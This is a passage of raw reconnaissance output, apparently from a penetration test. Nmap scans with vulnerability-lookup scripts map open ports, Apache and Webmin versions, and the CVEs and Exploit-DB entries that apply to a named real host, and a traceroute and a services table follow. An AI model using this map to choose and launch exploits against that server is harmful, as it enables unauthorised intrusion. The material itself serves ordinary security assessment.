18808| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
18809| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
18810| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
18811|
18812| SecurityFocus - https://www.securityfocus.com/bid/:
18813| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
18814| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
18815| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
18816| [15177] PHP Apache 2 Local Denial of Service Vulnerability
18817| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
18818| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
18819| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
18820| [5485] Apache 2.0 Path Disclosure Vulnerability
18821| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
18822| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
18823| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
18824| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
18825|
18826| IBM X-Force - https://exchange.xforce.ibmcloud.com:
18827| [75211] Debian GNU/Linux apache 2 cross-site scripting
18828|
18829| Exploit-DB - https://www.exploit-db.com:
18830| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
18831| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
18832| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
18833| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
18834| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
18835| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
18836| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
18837| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
18838| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
18839| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
18840| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
18841| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
18842| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
18843| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
18844| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
18845| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
18846| [21719] Apache 2.0 Path Disclosure Vulnerability
18847| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
18848| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
18849| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
18850| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
18851| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
18852| [17691] Apache Struts < 2.2.0 - Remote Command Execution
18853| [15319] Apache 2.2 (Windows) Local Denial of Service
18854| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
18855| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
18856| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
18857| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
18858| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
18859| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
18860| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
18861| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
18862| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
18863| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
18864| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
18865| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
18866| [9] Apache HTTP Server 2.x Memory Leak Exploit
18867|
18868| OpenVAS (Nessus) - http://www.openvas.org:
18869| [855524] Solaris Update for Apache 2 120544-14
18870| [855077] Solaris Update for Apache 2 120543-14
18871| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
18872| [72626] Debian Security Advisory DSA 2579-1 (apache2)
18873| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
18874| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
18875| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
18876| [71256] Debian Security Advisory DSA 2452-1 (apache2)
18877| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
18878| [70724] Debian Security Advisory DSA 2405-1 (apache2)
18879| [70235] Debian Security Advisory DSA 2298-2 (apache2)
18880| [70233] Debian Security Advisory DSA 2298-1 (apache2)
18881| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
18882| [69338] Debian Security Advisory DSA 2202-1 (apache2)
18883| [65131] SLES9: Security update for Apache 2 oes/CORE
18884| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
18885| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
18886| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
18887| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
18888| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
18889| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
18890| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
18891| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
18892| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
18893| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
18894| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
18895| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
18896| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
18897| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
18898| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
18899| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
18900| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
18901| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
18902| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
18903| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
18904| [11092] Apache 2.0.39 Win32 directory traversal
18905| [66081] SLES11: Security update for Apache 2
18906| [66074] SLES10: Security update for Apache 2
18907| [66070] SLES9: Security update for Apache 2
18908| [65893] SLES10: Security update for Apache 2
18909| [65888] SLES10: Security update for Apache 2
18910| [65510] SLES9: Security update for Apache 2
18911| [65249] SLES9: Security update for Apache 2
18912| [65230] SLES9: Security update for Apache 2
18913| [65228] SLES9: Security update for Apache 2
18914| [65207] SLES9: Security update for Apache 2
18915| [65136] SLES9: Security update for Apache 2
18916| [65017] SLES9: Security update for Apache 2
18917|
18918| SecurityTracker - https://www.securitytracker.com:
18919| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
18920| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
18921| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
18922| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
18923| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
18924|
18925| OSVDB - http://www.osvdb.org:
18926| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
18927|_
18928443/tcp open ssl/http Apache httpd 2.4.10 ((Debian))
18929|_http-server-header: Apache/2.4.10 (Debian)
18930| vulners:
18931| cpe:/a:apache:http_server:2.4.10:
18932| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
18933| CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
18934| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
18935| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
18936| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
18937| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
18938| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
18939| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
18940| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
18941| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
18942| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
18943| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
18944| CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743
18945| CVE-2016-2161 5.0 https://vulners.com/cve/CVE-2016-2161
18946| CVE-2016-0736 5.0 https://vulners.com/cve/CVE-2016-0736
18947| CVE-2014-3583 5.0 https://vulners.com/cve/CVE-2014-3583
18948| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
18949| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
18950| CVE-2015-3185 4.3 https://vulners.com/cve/CVE-2015-3185
18951| CVE-2014-8109 4.3 https://vulners.com/cve/CVE-2014-8109
18952| CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
18953|_ CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
18954| vulscan: VulDB - https://vuldb.com:
18955| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
18956| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
18957| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
18958| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
18959| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
18960| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
18961| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
18962|
18963| MITRE CVE - https://cve.mitre.org:
18964| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
18965| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
18966| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
18967| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
18968| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
18969| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
18970| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
18971| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
18972| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
18973| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
18974|
18975| SecurityFocus - https://www.securityfocus.com/bid/:
18976| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
18977| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
18978| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
18979| [15177] PHP Apache 2 Local Denial of Service Vulnerability
18980| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
18981| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
18982| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
18983| [5485] Apache 2.0 Path Disclosure Vulnerability
18984| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
18985| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
18986| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
18987| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
18988|
18989| IBM X-Force - https://exchange.xforce.ibmcloud.com:
18990| [75211] Debian GNU/Linux apache 2 cross-site scripting
18991|
18992| Exploit-DB - https://www.exploit-db.com:
18993| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
18994| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
18995| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
18996| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
18997| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
18998| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
18999| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
19000| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
19001| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
19002| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
19003| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
19004| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
19005| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
19006| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
19007| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
19008| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
19009| [21719] Apache 2.0 Path Disclosure Vulnerability
19010| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
19011| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
19012| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
19013| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
19014| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
19015| [17691] Apache Struts < 2.2.0 - Remote Command Execution
19016| [15319] Apache 2.2 (Windows) Local Denial of Service
19017| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
19018| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
19019| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
19020| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
19021| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
19022| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
19023| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
19024| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
19025| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
19026| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
19027| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
19028| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
19029| [9] Apache HTTP Server 2.x Memory Leak Exploit
19030|
19031| OpenVAS (Nessus) - http://www.openvas.org:
19032| [855524] Solaris Update for Apache 2 120544-14
19033| [855077] Solaris Update for Apache 2 120543-14
19034| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
19035| [72626] Debian Security Advisory DSA 2579-1 (apache2)
19036| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
19037| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
19038| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
19039| [71256] Debian Security Advisory DSA 2452-1 (apache2)
19040| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
19041| [70724] Debian Security Advisory DSA 2405-1 (apache2)
19042| [70235] Debian Security Advisory DSA 2298-2 (apache2)
19043| [70233] Debian Security Advisory DSA 2298-1 (apache2)
19044| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
19045| [69338] Debian Security Advisory DSA 2202-1 (apache2)
19046| [65131] SLES9: Security update for Apache 2 oes/CORE
19047| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
19048| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
19049| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
19050| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
19051| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
19052| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
19053| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
19054| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
19055| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
19056| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
19057| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
19058| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
19059| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
19060| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
19061| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
19062| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
19063| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
19064| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
19065| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
19066| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
19067| [11092] Apache 2.0.39 Win32 directory traversal
19068| [66081] SLES11: Security update for Apache 2
19069| [66074] SLES10: Security update for Apache 2
19070| [66070] SLES9: Security update for Apache 2
19071| [65893] SLES10: Security update for Apache 2
19072| [65888] SLES10: Security update for Apache 2
19073| [65510] SLES9: Security update for Apache 2
19074| [65249] SLES9: Security update for Apache 2
19075| [65230] SLES9: Security update for Apache 2
19076| [65228] SLES9: Security update for Apache 2
19077| [65207] SLES9: Security update for Apache 2
19078| [65136] SLES9: Security update for Apache 2
19079| [65017] SLES9: Security update for Apache 2
19080|
19081| SecurityTracker - https://www.securitytracker.com:
19082| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
19083| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
19084| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
19085| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
19086| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
19087|
19088| OSVDB - http://www.osvdb.org:
19089| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
19090|_
1909110000/tcp open http MiniServ 1.910 (Webmin httpd)
19092| vulscan: VulDB - https://vuldb.com:
19093| No findings
19094|
19095| MITRE CVE - https://cve.mitre.org:
19096| [CVE-2005-3912] Format string vulnerability in miniserv.pl Perl web server in Webmin before 1.250 and Usermin before 1.180, with syslog logging enabled, allows remote attackers to cause a denial of service (crash or memory consumption) and possibly execute arbitrary code via format string specifiers in the username parameter to the login form, which is ultimately used in a syslog call. NOTE: the code execution might be associated with an issue in Perl.
19097| [CVE-2005-3042] miniserv.pl in Webmin before 1.230 and Usermin before 1.160, when "full PAM conversations" is enabled, allows remote attackers to bypass authentication by spoofing session IDs via certain metacharacters (line feed or carriage return).
19098| [CVE-2005-0427] The ebuild of Webmin before 1.170-r3 on Gentoo Linux includes the encrypted root password in the miniserv.users file when building a tbz2 of the webmin package, which allows remote attackers to obtain and possibly crack the encrypted password.
19099| [CVE-2003-0101] miniserv.pl in (1) Webmin before 1.070 and (2) Usermin before 1.000 does not properly handle metacharacters such as line feeds and carriage returns (CRLF) in Base-64 encoded strings during Basic authentication, which allows remote attackers to spoof a session ID and gain root privileges.
19100|
19101| SecurityFocus - https://www.securityfocus.com/bid/:
19102| No findings
19103|
19104| IBM X-Force - https://exchange.xforce.ibmcloud.com:
19105| [23277] Webmin miniserv.pl Web server component username format string
19106|
19107| Exploit-DB - https://www.exploit-db.com:
19108| No findings
19109|
19110| OpenVAS (Nessus) - http://www.openvas.org:
19111| No findings
19112|
19113| SecurityTracker - https://www.securitytracker.com:
19114| [1006161] Usermin Input Validation Flaw in 'miniserv.pl' May Let Remote Users Gain User or Root Access
19115| [1006160] Webmin Input Validation Flaw in 'miniserv.pl' May Let Remote Users Spoof Session IDs and Gain Root Access
19116|
19117| OSVDB - http://www.osvdb.org:
19118| [79044] Webmin miniserv.pl Unspecified Local Password Disclosure
19119| [21222] Webmin/Usermin miniserv.pl Format String Remote Code Execution
19120| [19575] Webmin/Usermin miniserv.pl Metacharacter PAM Authentication Bypass
19121| [13772] Gentoo Webmin miniserv.users Encrypted Root Password Remote Disclosure
19122| [10803] Webmin/Usermin miniserv.pl Base-64 String Metacharacter Handling Session Spoofing
19123| [1844] Webmin miniserv.pl Environment Variable Cleartext Password Local Disclosure
19124|_
19125Aggressive OS guesses: Asus RT-AC66U router (Linux 2.6) (94%), Asus RT-N16 WAP (Linux 2.6) (94%), Asus RT-N66U WAP (Linux 2.6) (94%), Tomato 1.28 (Linux 2.6.22) (94%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (94%), Linux 2.6.39 (93%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (93%), OpenWrt White Russian 0.9 (Linux 2.4.30) (93%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.9 (92%)
19126No exact OS matches for host (test conditions non-ideal).
19127Uptime guess: 30.003 days (since Fri Sep 6 00:04:24 2019)
19128Network Distance: 14 hops
19129TCP Sequence Prediction: Difficulty=259 (Good luck!)
19130IP ID Sequence Generation: All zeros
19131Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
19132
19133TRACEROUTE (using port 1720/tcp)
19134HOP RTT ADDRESS
191351 35.71 ms 10.246.204.1
191362 37.55 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
191373 47.92 ms irb-0.agg1.qc1.ca.m247.com (37.120.128.168)
191384 46.13 ms te-1-5-2-0.bb1.fra2.de.m247.com (82.102.29.44)
191395 58.60 ms te0-0-0-3.rcr21.ymq02.atlas.cogentco.com (38.104.155.233)
191406 39.42 ms be2089.ccr21.ymq01.atlas.cogentco.com (154.54.45.113)
191417 128.68 ms be3043.ccr22.lpl01.atlas.cogentco.com (154.54.44.165)
191428 128.71 ms be2182.ccr41.ams03.atlas.cogentco.com (154.54.77.245)
191439 128.72 ms be3457.ccr21.ams04.atlas.cogentco.com (130.117.1.10)
1914410 128.75 ms worldstream.demarc.cogentco.com (149.14.93.114)
1914511 128.77 ms 109.236.95.181
1914612 128.76 ms 190.2.158.155
1914713 128.78 ms 185.106.120.66
1914814 108.85 ms latina.petite.guru (185.82.200.52)
19149
19150NSE: Script Post-scanning.
19151Initiating NSE at 00:08
19152Completed NSE at 00:08, 0.00s elapsed
19153Initiating NSE at 00:08
19154Completed NSE at 00:08, 0.00s elapsed
19155######################################################################################################################################
19156Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-06 00:08 EDT
19157NSE: Loaded 47 scripts for scanning.
19158NSE: Script Pre-scanning.
19159Initiating NSE at 00:08
19160Completed NSE at 00:08, 0.00s elapsed
19161Initiating NSE at 00:08
19162Completed NSE at 00:08, 0.00s elapsed
19163Initiating Parallel DNS resolution of 1 host. at 00:08
19164Completed Parallel DNS resolution of 1 host. at 00:08, 0.02s elapsed
19165Initiating UDP Scan at 00:08
19166Scanning latina.petite.guru (185.82.200.52) [15 ports]
19167Increasing send delay for 185.82.200.52 from 0 to 50 due to max_successful_tryno increase to 4
19168Increasing send delay for 185.82.200.52 from 50 to 100 due to max_successful_tryno increase to 5
19169Increasing send delay for 185.82.200.52 from 100 to 200 due to max_successful_tryno increase to 6
19170Completed UDP Scan at 00:08, 8.38s elapsed (15 total ports)
19171Initiating Service scan at 00:08
19172Initiating OS detection (try #1) against latina.petite.guru (185.82.200.52)
19173Retrying OS detection (try #2) against latina.petite.guru (185.82.200.52)
19174Initiating Traceroute at 00:08
19175Completed Traceroute at 00:09, 7.05s elapsed
19176Initiating Parallel DNS resolution of 1 host. at 00:09
19177Completed Parallel DNS resolution of 1 host. at 00:09, 0.00s elapsed
19178NSE: Script scanning 185.82.200.52.
19179Initiating NSE at 00:09
19180Completed NSE at 00:09, 0.00s elapsed
19181Initiating NSE at 00:09
19182Completed NSE at 00:09, 0.00s elapsed
19183Nmap scan report for latina.petite.guru (185.82.200.52)
19184Host is up (0.12s latency).
19185
19186PORT STATE SERVICE VERSION
1918753/udp closed domain
1918867/udp closed dhcps
1918968/udp closed dhcpc
1919069/udp closed tftp
1919188/udp closed kerberos-sec
19192123/udp closed ntp
19193137/udp filtered netbios-ns
19194138/udp filtered netbios-dgm
19195139/udp closed netbios-ssn
19196161/udp closed snmp
19197162/udp closed snmptrap
19198389/udp closed ldap
19199500/udp closed isakmp
19200520/udp closed route
192012049/udp closed nfs
19202Too many fingerprints match this host to give specific OS details
19203Network Distance: 14 hops
19204
19205TRACEROUTE (using port 138/udp)
19206HOP RTT ADDRESS
192071 ... 4
192085 18.58 ms 10.246.204.1
192096 ... 7
192108 17.77 ms 10.246.204.1
192119 55.21 ms 10.246.204.1
1921210 55.20 ms 10.246.204.1
1921311 55.19 ms 10.246.204.1
1921412 55.17 ms 10.246.204.1
1921513 36.92 ms 10.246.204.1
1921614 19.02 ms 10.246.204.1
1921715 ... 18
1921819 17.91 ms 10.246.204.1
1921920 21.81 ms 10.246.204.1
1922021 ... 27
1922128 18.51 ms 10.246.204.1
1922229 ...
1922330 17.76 ms 10.246.204.1
19224
19225NSE: Script Post-scanning.
19226Initiating NSE at 00:09
19227Completed NSE at 00:09, 0.00s elapsed
19228Initiating NSE at 00:09
19229Completed NSE at 00:09, 0.00s elapsed
19230#######################################################################################################################################
19231Hosts
19232=====
19233
19234address mac name os_name os_flavor os_sp purpose info comments
19235------- --- ---- ------- --------- ----- ------- ---- --------
19236185.82.200.52 latina.petite.guru Linux server
19237
19238Services
19239========
19240
19241host port proto name state info
19242---- ---- ----- ---- ----- ----
19243185.82.200.52 22 tcp ssh open OpenSSH 6.7p1 Debian 5+deb8u8 protocol 2.0
19244185.82.200.52 53 udp domain closed
19245185.82.200.52 67 udp dhcps closed
19246185.82.200.52 68 udp dhcpc closed
19247185.82.200.52 69 udp tftp closed
19248185.82.200.52 80 tcp http open Apache httpd 2.4.10 (Debian)
19249185.82.200.52 88 udp kerberos-sec closed
19250185.82.200.52 123 udp ntp closed
19251185.82.200.52 137 udp netbios-ns filtered
